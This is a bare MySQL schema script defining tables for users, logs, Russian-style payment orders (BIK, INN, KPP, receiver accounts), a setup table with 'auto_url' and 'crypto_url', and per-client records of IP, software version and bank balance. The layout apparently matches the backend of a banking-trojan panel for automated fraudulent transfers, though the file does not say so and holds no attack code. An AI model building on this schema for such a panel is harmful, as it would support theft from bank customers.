CREATE TABLE `bz`.`auth` (
`id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`user` VARCHAR( 255 ) NOT NULL ,
`pass` VARCHAR( 255 ) NOT NULL,
`role` VARCHAR(255)
) ENGINE = MYISAM CHARACTER SET utf8 COLLATE utf8_unicode_ci;

CREATE TABLE `bz`.`logs` (
`id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`uid` VARCHAR( 255 ) NOT NULL ,
`ip` VARCHAR( 255 ) NOT NULL ,
`msg` VARCHAR( 255 ) NOT NULL,
`dt`  DATETIME
) ENGINE = MYISAM CHARACTER SET utf8 COLLATE utf8_unicode_ci;

CREATE TABLE `bz`.`z` (
`id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`bank` VARCHAR( 255 ) NOT NULL ,
`acc` VARCHAR( 255 ) NOT NULL ,
`reason` VARCHAR( 255 ) NOT NULL ,
`value` VARCHAR( 255 ) NOT NULL ,
`status` VARCHAR( 255 ) NOT NULL
) ENGINE = MYISAM  CHARACTER SET utf8 COLLATE utf8_unicode_ci;
ALTER TABLE `z` ADD `cur` VARCHAR( 3 ) NOT NULL DEFAULT 'RUR'; 
ALTER TABLE `z` ADD `BIK` VARCHAR( 255 ) NOT NULL;
ALTER TABLE `z` ADD `RECEIVER` VARCHAR( 255 ) NOT NULL;
ALTER TABLE `z` ADD `ACC2` VARCHAR( 255 ) NOT NULL;
ALTER TABLE `z` ADD `INN` VARCHAR( 255 ) NOT NULL;
ALTER TABLE `z` ADD `NDS` INT NOT NULL DEFAULT '18';
ALTER TABLE `z` ADD `bkpp` VARCHAR( 255 ) NOT NULL , ADD `rkpp` VARCHAR( 255 ) NOT NULL ;
ALTER TABLE `z` ADD `value2` VARCHAR( 255 ) NOT NULL AFTER `value` , ADD `percent` VARCHAR( 255 ) NOT NULL AFTER `value2` ;

CREATE TABLE setup (
    id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
    auto_url VARCHAR(255),
    crypto_url VARCHAR(255),
    port INT
);

CREATE TABLE client (
    id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
    uid VARCHAR(255),
    ip VARCHAR(255),
    language VARCHAR(255),
    version VARCHAR(255),
    balance VARCHAR(255),
    currency VARCHAR(255)
);
ALTER TABLE `client` ADD `z_doc_num` VARCHAR( 255 );
ALTER TABLE `client` ADD `z_amount` VARCHAR( 255 );
ALTER TABLE `client` ADD `z_date` VARCHAR( 255 );
ALTER TABLE `client` ADD `z_balance` VARCHAR( 255 );
ALTER TABLE `client` ADD `acc_from` VARCHAR( 255 );
ALTER TABLE `client` ADD `RECEIVER` VARCHAR( 255 ) NOT NULL;
ALTER TABLE `client` ADD `url` VARCHAR( 255 ) NULL ;

CREATE TABLE log2 (
    id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
    uid VARCHAR(255),
    ip VARCHAR(255),
    msg TEXT,
    dt DATETIME
);